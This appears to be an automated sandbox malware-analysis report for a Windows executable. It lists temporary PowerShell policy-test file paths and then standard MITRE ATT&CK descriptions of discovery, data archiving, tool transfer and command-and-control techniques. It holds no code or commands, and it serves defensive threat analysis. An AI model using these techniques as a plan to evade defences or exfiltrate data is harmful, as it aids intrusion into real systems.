C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3e0bzs3d.4yb.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41mlyj2f.plr.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bfvovuox.s1h.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ggaxxm3p.4wn.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_npebohs4.pji.ps1

Windows Analysis Report
zufmUwylvo.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre